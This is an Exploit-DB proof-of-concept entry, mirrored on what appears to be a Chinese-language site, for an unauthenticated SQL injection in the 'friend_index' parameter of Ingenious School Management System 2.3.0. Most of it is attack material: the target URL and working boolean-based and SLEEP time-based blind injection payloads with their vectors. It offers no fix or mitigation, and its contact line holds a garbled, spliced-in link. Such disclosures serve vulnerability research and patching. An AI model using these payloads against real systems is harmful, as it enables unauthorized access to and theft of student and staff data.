Ingenious School Management System 2.3.0 – ‘friend_index’ SQL injection

  • 作者: Giulio Comi
    日期: 2017-11-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/43108/
  • # Exploit Title: Ingenious School Management System 2.3.0 - SQL injection
    # Date: 01.11.2017
    # Vendor Homepage: http://iloveprograming.com/
    # Software Link: https://www.codester.com/items/4945/ingenious-school-management-system
    # Demo: http://iloveprograming.com/view/login.php
    # Version: 2.3.0
    # Category: Webapps
    # Tested on: Kali Linux 2.0
    # Exploit Author: Giulio Comi
    # Contact: https://<http://ihsan.net/>linkedin.com/in/giuliocomi
    #Description
    
    This vulnerability allows an attacker to inject SQL commands (without authentication) in 'friend_index' GET parameter.
    
    # Proof of Concept:
    
    http://localhost/view/friend_profile.php?friend_type=Student&friend_index=[SQL_injection_payload]
    
    
    # Vulnerable Parameter: friend_index (GET)
    
    
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: friend_type=Student&friend_index=1' AND 2576=2576 AND 'YJeg'='YJeg
    Vector: AND [INFERENCE]
    
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: friend_type=Student&friend_index=1' AND SLEEP(5) AND 'rliO'='rliO
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])